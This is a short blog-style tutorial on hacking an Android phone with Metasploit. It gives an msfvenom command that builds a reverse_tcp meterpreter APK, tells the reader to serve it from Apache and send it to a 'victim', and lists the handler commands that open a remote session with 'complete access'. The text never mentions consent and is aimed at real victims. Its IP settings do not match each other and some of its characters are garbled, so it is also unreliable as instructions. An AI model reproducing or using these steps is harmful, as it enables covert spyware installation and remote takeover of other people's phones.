Hacking Android Phone Remotely Using Metasploit!!
How To Hack Phone Using Metasploit
First of all we are going generating the payload, we will setup a listener to Metasploit framework( From Msfconsole) . When victim download and install the apk , We can simply get a meterpreter session means we get complete access on that device.
If you want to send payload apk to victim use apache2 server with port forwarding.
Let's Start
Generating a Payload with msfvenomAt first, go to the Kali Linux / Termux so that we may generate an spyware malicious apk file as a malicious payload. We need to find our local IP that turns out to be β192.168.x.xxxβ. You can also do it on public ip using port forward.
Using msfvenom tool that will generate a payload to exploit the Android device. Type command:
msfvenom βp android/meterpreter/reverse_tcp LHOST=192.168.43.99 LPORT=4444 R> devilhacker.apk
This can take some time to generate an apk file of almost 10 thousand bytes.
Send it to victim π.
Launching an Attack
Before launching attack, we need to start the apache server. Type command:
service apache2 start
And Then Sudo Password Send Devilhacker.apk From Your Pc To Victim
Explotation:
msfconsole
After The Opening msfconsole Type:
use multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 4444
exploit
When Victim Open The App You Look That Meterpreter Sessions :
Now type help for seeing what can we do!
Comments
Post a Comment